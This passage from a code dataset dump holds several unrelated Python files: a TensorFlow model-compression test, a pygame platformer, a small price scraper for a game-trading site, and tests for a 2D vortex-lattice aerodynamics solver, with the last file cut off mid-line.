back\nvalue1 = 1\nprint(\"Before Function: \",value1)\nvalue1 = doThat(value1)\nprint(\"After Function: \",value1)\n\n\nlist = [1,2,3]\nlist2 = list\nprint(list)\nlist[0] = 100\nprint(list2)\nprint(\"Before Function: \",list)\ndoSomething(list)\nprint(\"After Function: \",list)\n\n","sub_path":"In Class Files/ReferenceTypeExplained.py","file_name":"ReferenceTypeExplained.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"140913105","text":"# Copyright 2022 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for EPR algorithm.\"\"\"\n\nimport os\nimport shutil\nfrom absl.testing import parameterized\nimport tensorflow as tf\nfrom tensorflow_model_optimization.python.core.common.keras.compression.algorithms import epr\n\n\ndef build_model():\n inputs = tf.keras.layers.Input(shape=(28, 28), name=\"input\")\n x = tf.keras.layers.Reshape((28, 28, 1))(inputs)\n x = tf.keras.layers.Conv2D(\n 20, 5, use_bias=True, activation=\"relu\", padding=\"valid\", name=\"conv1\")(x)\n x = tf.keras.layers.MaxPool2D(2, 2)(x)\n x = tf.keras.layers.Conv2D(\n 50, 5, use_bias=True, activation=\"relu\", padding=\"valid\", name=\"conv2\")(x)\n x = tf.keras.layers.MaxPool2D(2, 2)(x)\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(\n 500, use_bias=True, activation=\"relu\", name=\"fc1\")(x)\n outputs = tf.keras.layers.Dense(\n 10, use_bias=True, name=\"fc2\")(x)\n return tf.keras.Model(inputs=[inputs], outputs=[outputs])\n\n\ndef get_dataset():\n (x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n x_train = (x_train / 255).astype(\"float32\")\n x_test = (x_test / 255).astype(\"float32\")\n return (x_train, y_train), (x_test, y_test)\n\n\ndef train_model(model):\n model.compile(\n optimizer=tf.keras.optimizers.Adam(1e-2),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"accuracy\")],\n )\n (x_train, y_train), _ = get_dataset()\n model.fit(x_train, y_train, batch_size=128, epochs=3)\n\n\ndef evaluate_model(model):\n model.compile(\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"accuracy\")],\n )\n _, (x_test, y_test) = get_dataset()\n results = model.evaluate(x_test, y_test, batch_size=128, return_dict=True)\n return results[\"accuracy\"]\n\n\ndef train_and_compress_model():\n model = build_model()\n algorithm = epr.EPR(entropy_penalty=10.)\n training_model = algorithm.get_training_model(model)\n train_model(training_model)\n compressed_model = algorithm.compress_model(training_model)\n return model, training_model, compressed_model\n\n\ndef get_weight_size_in_bytes(weight):\n if weight.dtype == tf.string:\n return tf.reduce_sum(tf.strings.length(weight, unit=\"BYTE\"))\n else:\n return tf.size(weight) * weight.dtype.size\n\n\ndef zip_directory(dir_name):\n return shutil.make_archive(dir_name, \"zip\", dir_name)\n\n\nclass EPRTest(parameterized.TestCase, tf.test.TestCase):\n\n def _save_models(self, model, compressed_model):\n model_dir = self.create_tempdir().full_path\n original_model_dir = os.path.join(model_dir, \"original\")\n compressed_model_dir = os.path.join(model_dir, \"compressed\")\n model.save(original_model_dir)\n compressed_model.save(compressed_model_dir)\n return original_model_dir, compressed_model_dir\n\n @parameterized.parameters([5], [2, 3], [3, 4, 2], [2, 3, 4, 1])\n def 
test_project_training_weights_has_gradients(self, *shape):\n algorithm = epr.EPR(entropy_penalty=1.)\n init = tf.ones(shape, dtype=tf.float32)\n algorithm.init_training_weights(init)\n layer = tf.keras.layers.Layer()\n for weight_repr in algorithm.weight_reprs:\n layer.add_weight(*weight_repr.args, **weight_repr.kwargs)\n with tf.GradientTape() as tape:\n weight = algorithm.project_training_weights(*layer.weights)\n gradients = tape.gradient(weight, layer.weights)\n # Last weight is scale of prior. Should not have a gradient here.\n self.assertAllEqual(\n [g is not None for g in gradients],\n [w.dtype.is_floating for w in layer.weights[:-1]] + [False])\n\n @parameterized.parameters([5], [2, 3], [3, 4, 2], [2, 3, 4, 1])\n def test_compute_entropy_has_gradients(self, *shape):\n algorithm = epr.EPR(entropy_penalty=1.)\n init = tf.ones(shape, dtype=tf.float32)\n algorithm.init_training_weights(init)\n layer = tf.keras.layers.Layer()\n for weight_repr in algorithm.weight_reprs:\n layer.add_weight(*weight_repr.args, **weight_repr.kwargs)\n with tf.GradientTape() as tape:\n loss = algorithm.compute_entropy(*layer.weights)\n gradients = tape.gradient(loss, layer.weights)\n self.assertAllEqual(\n [g is not None for g in gradients],\n [w.dtype.is_floating for w in layer.weights])\n\n @parameterized.parameters([5], [2, 3], [3, 4, 2], [2, 3, 4, 1])\n def test_train_and_test_weights_are_equal(self, *shape):\n algorithm = epr.EPR(entropy_penalty=1.)\n init = tf.random.uniform(shape, dtype=tf.float32)\n algorithm.init_training_weights(init)\n layer = tf.keras.layers.Layer()\n for weight_repr in algorithm.weight_reprs:\n layer.add_weight(*weight_repr.args, **weight_repr.kwargs)\n train_weight = algorithm.project_training_weights(*layer.weights)\n compressed_weights = algorithm.compress_training_weights(*layer.weights)\n test_weight = algorithm.decompress_weights(*compressed_weights)\n self.assertAllEqual(train_weight, test_weight)\n\n def test_reduces_model_size_at_reasonable_accuracy(self):\n model, _, compressed_model = train_and_compress_model()\n original_model_dir, compressed_model_dir = self._save_models(\n model, compressed_model)\n\n with self.subTest(\"compressed_weights_are_smaller\"):\n original_size = sum(\n map(get_weight_size_in_bytes, model.weights)).numpy()\n compressed_size = sum(\n map(get_weight_size_in_bytes, compressed_model.weights)).numpy()\n self.assertLess(compressed_size, 0.01 * original_size)\n\n with self.subTest(\"zip_compressed_model_is_smaller\"):\n original_zipfile = zip_directory(original_model_dir)\n compressed_zipfile = zip_directory(compressed_model_dir)\n original_size = os.path.getsize(original_zipfile)\n compressed_size = os.path.getsize(compressed_zipfile)\n # TODO(jballe): There is a lot of overhead in the saved function graphs\n # (saved_model.pb), which is especially severe for small models like this\n # one. The function graph is several times larger than the weights. 
Can we\n      # save some space by only saving the function graph of the main call(),\n      # rather than of each layer?\n      self.assertLess(compressed_size, 0.2 * original_size)\n\n    with self.subTest(\"has_reasonable_accuracy\"):\n      compressed_model = tf.keras.models.load_model(compressed_model_dir)\n      accuracy = evaluate_model(compressed_model)\n      self.assertGreater(accuracy, .9)\n\n\nif __name__ == \"__main__\":\n  tf.test.main()\n","sub_path":"tensorflow_model_optimization/python/core/common/keras/compression/algorithms/epr_test.py","file_name":"epr_test.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108895345","text":"import os\r\nimport sys\r\nimport pygame\r\nfrom other_sprites import *\r\nfrom helping_functions import *\r\nfrom player import *\r\nfrom time import sleep\r\n\r\n\r\nSCREEN_WIDTH = 1250\r\nSCREEN_HEIGHT = 850\r\nSYMB_FOR_SPARE_PLACE_IN_LEVEL_FILE = '.'\r\n\r\n# level loading\r\ndef load_level(filename):\r\n filename = os.path.join(\"data\", filename)\r\n with open(filename, 'r') as mapFile:\r\n level_map = [line.strip() for line in mapFile]\r\n max_width = max(map(len, level_map))\r\n return list(map(lambda x: x.ljust(max_width,\r\n SYMB_FOR_SPARE_PLACE_IN_LEVEL_FILE),\r\n level_map))\r\n\r\n# Function that ends the game\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit(0)\r\n \r\n \r\nclass Main:\r\n def __init__(self):\r\n pygame.init()\r\n self.width = SCREEN_WIDTH\r\n self.height = SCREEN_HEIGHT\r\n self.size = (self.width, self.height)\r\n self.screen = pygame.display.set_mode(self.size)\r\n self.fps = FPS\r\n self.clock = pygame.time.Clock()\r\n\r\n if self.start_screen():\r\n if self.start_game():\r\n self.end_screen()\r\n # Splash screen\r\n def start_screen(self):\r\n intro_text = [\"ЗАСТАВКА\", \"\", \"Правила игры\", \"\", \"True\"]\r\n \r\n background = pygame.transform.scale(load_image(START_BACKGROUND),\r\n (self.width, self.height))\r\n self.screen.blit(background, (0, 0))\r\n font = pygame.font.Font(None, 30)\r\n text_coord = 50\r\n for line in intro_text:\r\n string_rendered = font.render(line, 1, pygame.Color('black'))\r\n intro_rect = string_rendered.get_rect()\r\n text_coord += 10\r\n intro_rect.top = text_coord\r\n intro_rect.x = 10\r\n text_coord += intro_rect.height\r\n self.screen.blit(string_rendered, intro_rect)\r\n \r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n elif event.type == pygame.KEYDOWN or \\\r\n event.type == pygame.MOUSEBUTTONDOWN:\r\n return True\r\n pygame.display.flip()\r\n self.clock.tick(10)\r\n \r\n # End-of-game screen\r\n def end_screen(self):\r\n end_text = [\"Конец\", 'Вы победили',\r\n \"Нажмите любую кнопку,\", \"чтобы выйти\"]\r\n\r\n background = pygame.transform.scale(load_image(END_BACKGROUND),\r\n (self.width, self.height))\r\n self.screen.blit(background, (0, 0))\r\n font = pygame.font.Font(None, 20)\r\n text_coord = 200\r\n for line in end_text:\r\n string_rendered = font.render(line, 1, pygame.Color('red'))\r\n intro_rect = string_rendered.get_rect()\r\n text_coord += 10\r\n intro_rect.top = text_coord\r\n intro_rect.x = 10\r\n text_coord += intro_rect.height\r\n self.screen.blit(string_rendered, intro_rect)\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or \\\r\n event.type == pygame.KEYDOWN or \\\r\n event.type == pygame.MOUSEBUTTONDOWN:\r\n terminate()\r\n pygame.display.flip()\r\n self.clock.tick(10)\r\n\r\n # The game itself\r\n 
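# Builds the sprite groups, spawns entities from the level map, and runs the main loop until the player reaches the end tile.\r\n 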
def start_game(self):\r\n background_group = pygame.sprite.Group()\r\n all_sprites = pygame.sprite.LayeredUpdates() \r\n player_group = pygame.sprite.GroupSingle()\r\n bullet_group = pygame.sprite.Group() \r\n platforms_group = pygame.sprite.Group()\r\n fire_group = pygame.sprite.Group()\r\n enemy_group = pygame.sprite.Group()\r\n save_group = pygame.sprite.Group()\r\n end_group = pygame.sprite.Group()\r\n groups_to_update_with_camera = [player_group, platforms_group, \r\n bullet_group, fire_group, enemy_group, \r\n save_group, end_group] \r\n \r\n bck = Background(background_group)\r\n all_sprites.add(bck, layer=-1)\r\n\r\n level = load_level(\"level5.txt\")\r\n player = checkpoint = start_checkpoint = None\r\n camera = Camera(groups_to_update_with_camera)\r\n for y in range(len(level)):\r\n for x in range(len(level[y])):\r\n if level[y][x] == SYMB_FOR_PLATFORM_IN_LEVEL_FILE:\r\n plt = Platform((x, y), platforms_group)\r\n all_sprites.add(plt, layer=0)\r\n \r\n elif level[y][x] == SYMB_FOR_FIRE_IN_LEVEL_FILE:\r\n fire = Fire((x, y), fire_group)\r\n all_sprites.add(fire, layer=1)\r\n \r\n elif level[y][x] == SYMB_FOR_PLAYER_IN_LEVEL_FILE:\r\n start_checkpoint = Checkpoint_Tile((x, y), save_group)\r\n player = Player((x, y), player_group)\r\n all_sprites.add(player, layer=2)\r\n player.groups = player.groups() \r\n \r\n elif level[y][x] == 's':\r\n snail = Snail((x, y - 0.70), enemy_group)\r\n all_sprites.add(snail, layer=2) \r\n \r\n elif level[y][x] == 'R':\r\n robot = Robot((x, y), enemy_group)\r\n all_sprites.add(robot, layer=2) \r\n \r\n elif level[y][x] == 'S':\r\n checkpoint = Checkpoint_Tile((x, y), save_group)\r\n all_sprites.add(checkpoint, layer=1)\r\n\r\n elif level[y][x] == 'E':\r\n end = End_tile((x, y), end_group)\r\n all_sprites.add(end, layer=2)\r\n\r\n left, right, up = False, False, False\r\n actions_list = [left, right, up]\r\n checkpoint = start_checkpoint\r\n \r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n # Signals received from the player\r\n if event.type == pygame.KEYDOWN:\r\n if event.key in DCT_FOR_MOVING_PLAYER.keys():\r\n actions_list[DCT_FOR_MOVING_PLAYER[event.key]] = True\r\n elif event.key == pygame.K_SPACE: \r\n player.shoot(bullet_group, all_sprites) \r\n \r\n if event.type == pygame.KEYUP:\r\n if event.key in DCT_FOR_MOVING_PLAYER.keys():\r\n actions_list[DCT_FOR_MOVING_PLAYER[event.key]] = False\r\n \r\n for enemy in enemy_group:\r\n if enemy.image_name != 'robot.png':\r\n enemy.move()\r\n else:\r\n enemy.move(bullet_group, all_sprites)\r\n # Reset the screen to default\r\n self.screen.fill((0, 0, 0))\r\n camera.update(player)\r\n for bullet in bullet_group: \r\n bullet.update(enemy_group if bullet.flag_to_diff == 'enemy'\r\n else player, platforms_group, SCREEN_WIDTH) \r\n for end in end_group:\r\n if end.update(player):\r\n sleep(1)\r\n return True\r\n for group in groups_to_update_with_camera:\r\n for sprite in group:\r\n camera.apply(sprite)\r\n camera.word_r, camera.word_l = False, False\r\n camera.word_up, camera.word_down = False, False\r\n checkpoint = player.update(*actions_list, platforms_group,\r\n bullet_group,\r\n [fire_group, enemy_group],\r\n checkpoint, save_group) \r\n \r\n all_sprites.draw(self.screen)\r\n \r\n pygame.display.flip()\r\n self.clock.tick(FPS)\r\n\r\n\r\n# Background\r\nclass Background(pygame.sprite.Sprite):\r\n def __init__(self, background_group):\r\n super().__init__(background_group)\r\n self.image = pygame.transform.scale(load_image(GAME_BACKGROUND),\r\n 
(SCREEN_WIDTH, SCREEN_HEIGHT))\r\n self.rect = self.image.get_rect()\r\n \r\n# Camera\r\nclass Camera:\r\n def __init__(self, update_group):\r\n self.update_group = update_group\r\n self.dx = SCREEN_WIDTH\r\n self.dy = SCREEN_HEIGHT\r\n self.word_r = False\r\n self.word_l = False\r\n self.word_up = False\r\n self.word_down = False\r\n\r\n def apply(self, obj):\r\n if self.word_r:\r\n obj.rect.x -= self.dx\r\n if self.word_l:\r\n obj.rect.x += self.dx\r\n if self.word_up:\r\n obj.rect.y -= self.dy\r\n if self.word_down:\r\n obj.rect.y += self.dy \r\n \r\n def update(self, target):\r\n if target.rect.x >= SCREEN_WIDTH:\r\n self.word_r = True\r\n if target.rect.x <= 0:\r\n self.word_l = True\r\n if target.rect.y >= SCREEN_HEIGHT:\r\n self.word_up = True\r\n if target.rect.y <= 0:\r\n self.word_down = True\r\n \r\n\r\nif __name__ == '__main__':\r\n # Define the variables\r\n FPS = 60\r\n START_BACKGROUND = 'start_background.png'\r\n END_BACKGROUND = 'end_background.png'\r\n LEVEL_FILENAME = 'level.txt'\r\n SYMB_FOR_PLATFORM_IN_LEVEL_FILE = '#'\r\n SYMB_FOR_PLAYER_IN_LEVEL_FILE = '@'\r\n SYMB_FOR_FIRE_IN_LEVEL_FILE = 'F'\r\n DCT_FOR_MOVING_PLAYER = {pygame.K_w: 2, pygame.K_a: 1, pygame.K_d: 0}\r\n GAME_BACKGROUND = 'game_background.png'\r\n\r\n main = Main()","sub_path":"pygame_project_1.py","file_name":"pygame_project_1.py","file_ext":"py","file_size_in_byte":10025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"60834610","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\ndef get_7881():\n headers = {'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}\n url = 'https://search.7881.com/list.html?pageNum=1&gameId=G5569>id=100001&carrierId=0&groupId=G5569P002&serverId=G5569P002028&mobileGameType=&faceId=&tradeType=&tradePlace=&shopSortTypeCode=1&sortType=default&listSearchKeyWord=&mainSearchKeyWord=&minPrice=&maxPrice=&otherFilterValue=313346%3D%E8%81%94%E7%9B%9F&rentalByHourStart=&rentalByHourEnd=&propertiess=&chiledPropertiess=&platformId=&platformName=&order=&loginMethod=&rGameId=&tagName=&priceTag=&instock=false&quickChoose=0'\n res = requests.get(url=url, headers=headers)\n contents = BeautifulSoup(res.text, 'html.parser')\n total_price = contents.find('div', class_=\"list-item\").find('div',class_=\"list-v part-02\")\n re_total_price = re.findall(r'[1-9]\d*\.\d*|0\.\d*[1-9]\d*', total_price.text)\n per_price = contents.find('div', class_=\"list-item\").find('div',class_=\"list-v part-03\").find('p').find('em')\n total_g = float(re_total_price[0])/float(per_price.text)\n print('7881 current lowest unit price is %.4f, total amount is %d'%((float(per_price.text)), int(total_g)))\n","sub_path":"g7881.py","file_name":"g7881.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"465578823","text":"'''\n@author: salvatore maraniello\n@date: 23 May 2017\n@brief: tests for 2D UVLM dynamic solver\n@note: \n\nReferences:\n[1] Simpson, R.J.S., Palacios, R. & Murua, J., 2013. Induced-Drag \n\tCalculations in the Unsteady Vortex Lattice Method. 
AIAA Journal, 51(7), \n\tpp.1775–1779.\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#ahahahah\n\n\nimport uvlm2d_dyn as uvlm\nimport pp_uvlm2d as pp\nimport analytical as an\nimport set_dyn, set_gust\nimport save\n\nimport unittest\nfrom IPython import embed\n\n\n\nclass Test_dyn(unittest.TestCase):\n\t'''\n\tEach method defined in this class contains a test case.\n\t@warning: by default, only functions whose name starts with 'test' will be \n\trun during testing.\n\t'''\n\n\n\tdef setUp(self):\n\t\t''' Common piece of code to initialise the test '''\n\t\tpass\n\n\n\tdef test_steady(self):\n\t\t'''\n\t\tCalculate steady case / very short wake can be used.\n\t\t'''\n\n\n\t\t##### Plate at an angle\n\t\tc=3.\n\t\tb=0.5*c\n\t\tuinf=20.0\n\t\tT=1.0\n\t\tMList=[1,4,8]\n\t\tWakeFact=2\n\n\t\tTimeList=[]\n\t\tTHCFList=[]\n\t\tfor mm in range(len(MList)):\n\t\t\tM=MList[mm]\n\t\t\tS=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t\t \t alpha=2.*np.pi/180.,rho=1.225)\n\t\t\tS.build_flat_plate()\n\t\t\tS.eps_Hall=0.003\n\t\t\tS.solve_dyn_Gamma2d()\n\t\t\tTimeList.append(S.time)\n\t\t\tTHCFList.append(S.THFaero/S.qinf/S.chord)\n\n\n\t\tclist=['k','r','b','0.6',]\n\t\tfig = plt.figure('Aerodynamic forces',(10,6))\n\t\t#\n\t\tax=fig.add_subplot(131)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(TimeList[mm],THCFList[mm][:,1],clist[mm],\n\t\t\t\t label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\t\t#\n\t\tax=fig.add_subplot(132)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(TimeList[mm],THCFList[mm][:,1]/S.alpha,clist[mm],\n\t\t\t\t label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('CL alpha')\n\t\tax.legend()\n\t\t#\n\t\tax=fig.add_subplot(133)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(TimeList[mm],THCFList[mm][:,0],clist[mm],\n\t\t\t\t label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Drag')\n\t\tax.legend()\t\n\t\t#plt.show()\n\n\n\t\t##### Plate with velocity\n\t\tM=4\n\t\tS=uvlm.solver(T=5.,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t\t \t alpha=0.*np.pi/180.,rho=1.225)\n\t\tS.build_flat_plate()\n\t\taeff=3.*np.pi/180.\n\t\twplate=-np.tan(aeff)*uinf\n\t\tS.dZetadt[:,1]=wplate\n\t\tfor tt in range(1,S.NT):\n\t\t\tS.THZeta[tt,:,1]=wplate*S.time[tt]\n\t\tS.eps_Hall=0.003\n\t\tS.solve_dyn_Gamma2d()\n\n\t\tqinf_eff=0.5*S.rho*np.linalg.norm([uinf,wplate])**2\n\t\tTHCF=S.THFaero/S.chord/qinf_eff\n\t\tcaeff,saeff=np.cos(aeff),np.sin(aeff)\n\t\tCmat=np.array([[caeff,saeff],[-saeff,caeff]])\n\t\tfor tt in range(S.NT):\n\t\t\tTHCF[tt,:]=np.dot(Cmat,THCF[tt,:])\n\n\t\tfig = plt.figure('Aerodynamic forces in wind coord.',(10,6))\n\t\tax=fig.add_subplot(131)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(S.time,THCF[:,1],'k',label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Perpendicular')\n\t\t#\n\t\tax=fig.add_subplot(132)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(S.time,THCF[:,1]/aeff,'k',label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Perpendicular - coefficient')\n\t\t#\n\t\tax=fig.add_subplot(133)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(S.time,THCF[:,0],'k',label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Tangent')\n\t\tplt.show()\n\n\n\tdef test_plunge(self,case=1,M=8,WakeFact=15):\n\t\t'''\n\t\tPlunge motion at a fixed reduced frequency\n\t\t'''\n\n\t\t### random geometry\n\t\tc=3.\n\t\tb=0.5*c\n\n\t\t### motion [Ref.[1]]\n\t\tif 
case==1:\n\t\t\tktarget=.1\n\t\t\tH=0.2*b\n\t\t\tNcycles=10.\n\t\tif case==2:\n\t\t\tktarget=1.\n\t\t\tH=0.02*b\n\t\t\tNcycles=16.\n\t\tif case==3:\n\t\t\tktarget=.5\n\t\t\tH=0.05*b\n\t\t\tNcycles=12.\t\n\t\tif case==4:\n\t\t\tktarget=.25\n\t\t\tH=0.2*b\n\t\t\tNcycles=10.\t\t\n\t\tif case==5:\n\t\t\tktarget=.5\n\t\t\tH=0.2*b\n\t\t\tNcycles=12.\t\n\t\tif case==6:\n\t\t\tktarget=.75\n\t\t\tH=0.2*b\n\t\t\tNcycles=5\n\n\t\tf0=10.#Hz\n\t\tw0=2.*np.pi*f0 #rad/s\n\t\tuinf=b*w0/ktarget\n\t\t# Numerical solution\n\t\tT=2.*np.pi*Ncycles/w0\n\n\t\t###### Numerical solution\n\t\tS=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t \t alpha=0.*np.pi/180.,rho=1.225)\n\t\tS.build_flat_plate()\n\t\tS=set_dyn.plunge(S,f0=f0,H=H)\n\t\tS.eps_Hall=0.003\n\t\tS._update_AIC=True\n\t\tS._quasi_steady=False\n\t\tS.solve_dyn_Gamma2d()\n\n\t\tS.save(savedir='./res_plunge/k%.2d/'%(ktarget*10),\n\t\t h5filename='M%.2dwk%.2dcyc%.2d'%(M,WakeFact,Ncycles))\n\n\t\t##### Analytical solution\n\t\t# Garrik - induced drag\n\t\tCdv=an.garrick_drag_plunge(w0,H,S.chord,S.rho,uinf,S.time)\n\t\thv=-H*np.cos(w0*S.time)\n\t\tdhv=w0*H*np.sin(w0*S.time)\n\t\taeffv_an=np.arctan(-dhv/uinf)\n\t\t# Theodorsen - lift\n\t\tLtot_an, Lcirc_an, Lmass_an = an.theo_lift(w0,A=0,H=H,c=S.chord,\n\t\t\t\t\t\t\t\t\t rhoinf=S.rho,uinf=S.Uinf[0],x12=0.0)\n\t\tph_tot,ph_circ,ph_mass=np.angle(Ltot_an),np.angle(Lcirc_an),np.angle(Lmass_an)\n\t\thc_an=H/S.chord*np.cos(w0*S.time)\n\t\tCLtot_an=np.abs(Ltot_an)*np.cos(w0*S.time+ph_tot)/ (S.chord*S.qinf)\n\t\tCLcirc_an=np.abs(Lcirc_an)*np.cos(w0*S.time+ph_circ)/ (S.chord*S.qinf)\n\t\tCLmass_an=np.abs(Lmass_an)*np.cos(w0*S.time+ph_mass)/ (S.chord*S.qinf)\n\n\t\t##### Post-process numerical solution\n\t\taeffv_num=aeffv_an # derivative is the same as analytical\n\t\tTHCF=S.THFaero/S.qinf/S.chord\n\t\t# Mass and circulatory contribution\n\t\tTHCFmass=np.zeros((S.NT,2))\n\t\tfor tt in range(S.NT):\n\t\t\tTHCFmass[tt,:]=S.THFmassC[tt,:,:].sum(0)/S.qinf/S.chord\n\t\tTHCFcirc=THCF-THCFmass\n\t\t# Approximation of added mass\n\t\tTHCFmass_approx=np.zeros((S.NT))\n\t\tGtot_old=0.0\n\t\tfor tt in range(1,S.NT):\n\t\t\tGtot_new=S.THgamma[tt,:].sum()\n\t\t\tdgtot=Gtot_new-Gtot_old\n\t\t\tGtot_old=Gtot_new\n\t\t\tTHCFmass_approx[tt]=-S.rho*dgtot/S.dt/S.qinf\n\n\n\t\t##### Lift check - Numerical vs. 
Theodorsen\n\t\tfig = plt.figure('Lift coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\t### numerical\n\t\tax.plot(S.time, THCF[:,1],'k',lw=1,label='Num Tot')\n\t\t#ax.plot(S.time, THCFmass[:,1],'b',lw=1,label='Num Mass')\n\t\t#ax.plot(S.time, THCFcirc[:,1],'r',lw=1,label='Num Circ')\n\t\t### approximation\n\t\tax.plot(S.time, THCFmass_approx, 'y^', label='Approx Mass')\n\t\t# Theodorsen\n\t\tax.plot(S.time, CLtot_an,'k--',lw=2,label='An Tot')\n\t\t#ax.plot(S.time, CLmass_an,'b--',lw=2,label='An Mass')\n\t\t#ax.plot(S.time, CLcirc_an,'r--',lw=2,label='An Circ')\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\n\n\t\tfig = plt.figure('Drag coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.plot(S.time, THCF[:,0],'k',label='Num Tot')\n\t\t#ax.plot(S.time, THCFmass[:,0],'b',label='Num Mass')\n\t\t#ax.plot(S.time, THCFcirc[:,0],'r',label='Num Circ')\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Drag')\n\t\tax.legend()\n\t\tplt.show()\n\n\t\tfig = plt.figure('Induced drag in plunge motion - Phase vs kinematics',\n\t\t\t (10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.plot(180./np.pi*aeffv_an,Cdv,'k',label=r'Analytical')\n\t\tax.plot(180./np.pi*aeffv_num,THCF[:,0],'b',label=r'Numerical')\n\t\tax.set_xlabel('deg')\n\t\tax.legend()\n\t\tfig.savefig('./figs/M%.2dW%.3dK%.2d_CD_F%.1dC%.1d_N%.2d_eps%.2e.png'\n\t\t\t %(M,WakeFact,10*ktarget,f0,c,Ncycles,S.eps_Hall) )\n\n\n\t\t# Time histories of circulation\n\t\tfig = plt.figure('Vortex rings circulation time history',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tclist=['0.2','0.4','0.6']\n\t\tMlist=[0,int(S.M/2),S.M-1]\n\t\tfor kk in range(len(Mlist)):\n\t\t\tmm=Mlist[kk]\n\t\t\tax.plot(S.time,S.THGamma[:,mm],color=clist[kk],label='M=%.2d'%(mm))\n\t\tclist=['r','y','b']\n\t\tMWlist=[0,int(S.Mw/2),S.Mw-1]\n\t\tfor kk in range(len(MWlist)):\n\t\t\tmm=Mlist[kk]\n\t\t\tax.plot(S.time,S.THGammaW[:,mm],color=clist[kk],label='Mw=%.2d'%(mm))\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('Gamma')\n\t\tax.legend()\n\t\tplt.show()\n\n\n\t\t# fig = plt.figure('Aero force at TE',(10,6))\n\t\t# ax=fig.add_subplot(111)\n\t\t# ax.plot(S.time,S.THFdistr[:,-1,0],'k',label=r'drag')\n\t\t# ax.plot(S.time,S.THFdistr[:,-1,1],'b',label=r'lift')\n\t\t# ax.set_xlabel('time')\n\t\t# ax.set_ylabel('force')\n\t\t# ax.legend()\n\t\t# plt.show()\n\n\n\t\t# ### plot net intensity of vortices along the aerofoil\n\t\t# for mm in range(S.M):\n\t\t# \tplt.plot(S.time,S.THgamma[:,mm],label='M=%.2d' %mm)\n\t\t# \tplt.xlabel('time [s]')\n\t\t# plt.legend(ncol=2)\n\t\t# plt.show()\n\n\t\t# # verify kutta condition\n\t\t# gte=np.zeros((S.NT))\n\t\t# for tt in range(1,S.NT):\n\t\t# \tGtot_old=np.sum(S.THgamma[tt-1,:])\n\t\t# \tGtot_new=np.sum(S.THgamma[tt,:])\n\t\t# \tgte[tt]=-(Gtot_new-Gtot_old)\n\t\t# fig = plt.figure('Net vorticity at TE',(10,6))\n\t\t# ax=fig.add_subplot(111)\n\n\t\t# ax.plot(S.time,S.THgammaW[:,0],color='k',label='Numerical')\n\t\t# ax.plot(S.time,gte,'r--',lw=2,label='Verification')\n\n\t\t# ax.set_xlabel('time')\n\t\t# ax.set_ylabel('Gamma')\n\t\t# ax.legend()\n\t\t# plt.show()\n\n\n\n\tdef test_sin_gust(self):\n\n\t\t'''\n\t\tResponse to a travelling sinusoidal gust (Sears problem)\n\t\t'''\n\n\t\t# random geometry\n\t\tc=3.\n\t\tb=0.5*c\n\n\t\t# gust profile\n\t\tw0=0.003\n\t\tuinf=2.0\n\t\tL=10.0*c # <--- gust 